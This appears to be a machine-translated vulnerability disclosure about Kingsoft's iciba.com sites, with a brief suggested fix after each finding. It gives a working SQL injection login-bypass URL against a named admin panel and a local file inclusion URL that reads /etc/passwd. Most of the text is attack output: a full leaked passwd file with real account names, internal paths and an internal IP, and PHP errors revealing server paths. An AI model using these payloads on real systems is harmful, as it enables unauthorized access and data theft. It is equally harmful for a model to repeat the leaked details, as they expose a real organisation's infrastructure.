ICIBA information background management system login box SQL Injection
Http://news.iciba.com/admin/index.php? Mod = login & act = ajaxlogin & username = 'or ''='' or ''=' & pwd = 'or'' = ''or'' ='
Http://news.iciba.com/admin/index.php
Solution: filter parameters
Kingsoft's local File Inclusion Vulnerability + absolute path leakage (in fact, it is the same). It has been confirmed that the require_once () function is used, but I cannot find an upload point for half a day, so we didn't proceed.
Detailed Description: files include: http://sl.iciba.com/rss.php? Rtype =.../etc/passwd % 00
Root: x: 0: 0: root:/bin/bash
Bin: x: 1: 1: bin:/sbin/nologin
Daemon: x: 2: 2: daemon:/sbin/nologin
Adm: x: 3: 4: adm:/var/adm:/sbin/nologin
Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin
Sync: x: 5: 0: sync:/sbin:/bin/sync
Shutdown: x: 6: 0: shutdown:/sbin/shutdown
Halt: x: 7: 0: halt:/sbin/halt
Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin
News: x: 9: 13: news:/etc/news:
Uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin
Operator: x: 11: 0: operator:/root:/sbin/nologin
Games: x: 12: 100: games:/usr/games:/sbin/nologin
Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin
Ftp: x: 14: 50: FTP User:/var/ftp:/sbin/nologin
Nobody: x: 99: 99: Nobody: // sbin/nologin
Messages: x: 81: 81: System message bus: // sbin/nologin
Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin
Rpm: x: 37: 37:/var/lib/rpm:/sbin/nologin
Haldaemon: x: 68: 68: HAL daemon: // sbin/nologin
Netdump: x: 34: 34: Network Crash Dump user:/var/crash:/bin/bash
Nscd: x: 28: 28: NSCD Daemon: // sbin/nologin
Sshd: x: 74: 74: Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
Rpc: x: 32: 32: Portmapper RPC user: // sbin/nologin
Mailnull: x: 47: 47:/var/spool/mqueue:/sbin/nologin
Smmsp: x: 51: 51:/var/spool/mqueue:/sbin/nologin
Rpcuser: x: 29: 29: RPC Service User:/var/lib/nfs:/sbin/nologin
Nfsnobody: x: 4294967294: 4294967294: Anonymous NFS User:/var/lib/nfs:/sbin/nologin
Pcap: x: 77: 77:/var/arpwatch:/sbin/nologin
Xfs: x: 43: 43: X Font Server:/etc/X11/fs:/sbin/nologin
Pegasus: x: 66: 65: tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
Htt: x: 100: 101: IIIMF Htt:/usr/lib64/im:/sbin/nologin
Www: x: 48: 48:/data/app:/bin/bash
Mysql: x: 512: 512:/home/mysql:/bin/bash
Ntp: x: 38: 38:/etc/ntp:/sbin/nologin
Oscar: x: 518: 519:/data/app/Oscar:/bin/bash
Vote_www: x: 519: 520:/data/app/vote.www.iciba.com:/bin/bash
Nagios: x: 101: 102: nagios:/var/log/nagios:/bin/sh
Icibaweb: x: 520: 521:/data/app/192.168.0.14/news.iciba.com/:/sbin/nologin
Huangjin: x: 525: 48:/data/app/wap.iciba.com/wwwroot:/bin/bash
Ciba_duanjing: x: 522: 48:/data/app/wap.iciba.com/wwwroot:/sbin/nologin
Survey: x: 528: 48:/data/apps/wap.iciba.com/iciba_wap/ef_survey:/sbin/nologin
Cibayw: x: 530: 530:/home/cibayw:/bin/bash
Changjf: x: 533: 533:/data/app/wap.iciba.com/:/sbin/nologin
Jinqifa: x: 535: 535:/home/jinqifa:/bin/bash
Linshi: x: 536: 536:/opt/kingsoft/sbin/data/baknslicba:/bin/bash
Vuser: x: 537: 537:/data/app/192.168.0.14/news.iciba.com/test:/bin/bash
Zouyang: x: 538: 538:/data/app/sl.iciba.com/wwwroot/:/bin/bash
Xueni: x: 539: 539:/home/xueni:/bin/bash
<Br/>
<B> Notice </B>: Undefined variable: rss_title in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 19 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rss_link in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 20 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rss_desc in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 21 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rss_language in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 23 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rss_pubDate in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 23 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rss_pubDate in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 24 </B> <br/>
<Br/>
<B> Notice </B>: Undefined variable: rssData in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 26 </B> <br/>
<Br/>
<B> Warning </B>: Invalid argument supplied for foreach () in <B>/data/app/sl.iciba.com/nphp/rss.php </B> on line <B> 26 </B> <br/>
<? Xml version = "1.0" encoding = "UTF-8"?>
<Rss xmlns: xsd = "http://www.w3.org/2001/XMLSchema" xmlns: xsi = "http://www.w3.org/2001/XMLSchema-instance" xmlns: trackback = "http://madskills.com/public/xml/rss/module/trackback/" xmlns: wfw = "http://wellformedweb.org/CommentAPI/" xmlns: dc = "http://purl.org/dc/elements/1.1/" version = "2.0">
<Channel>
<Title> <! [CDATA []> </title>
<Link> <! [CDATA []> </link>
<Description> <! [CDATA []> </description>
<Language> </language>
<PubDate> </pubDate>
<LastBuildDate> </channel> </rss>
Solution:
Filter more externally submitted data